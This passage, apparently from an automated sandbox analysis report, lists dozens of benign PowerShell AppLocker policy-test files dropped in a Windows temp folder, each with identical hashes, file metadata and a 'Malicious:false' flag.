                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hyxnzqlo.jan.ps1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_icgkkluj.nfh.psm1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iineqlhr.nv4.ps1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_imuznagr.m3q.psm1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ipvhen41.zoh.psm1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_irhq5joo.yny.psm1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iteynk43.43f.ps1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jgfy0ady.h3t.ps1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kk5s0xym.giu.ps1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kz4jk3gx.kak.ps1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lb3zs2o3.gso.psm1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m1hhpkj4.ssk.ps1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mov11iwv.z2s.ps1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_n3nhxuo3.pv5.psm1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nd0ruuc0.zgr.ps1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nfduznm2.t4t.psm1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nmbnsrgx.v2c.psm1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nndhnsr1.yb1.ps1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nrcs2drn.bew.psm1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pog0jvc1.k5f.psm1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rdoj1pp3.lfj.ps1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rhqnpcl2.kea.ps1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rk4wozhb.wnk.psm1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rrbvgjwq.3ge.ps1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sshlrcnu.pjq.psm1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sz2kpwzn.was.ps1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tqnj00qh.wea.ps1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uhufrcow.c1o.psm1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_v1jishgm.hqw.ps1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vhnuij0t.b0n.psm1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
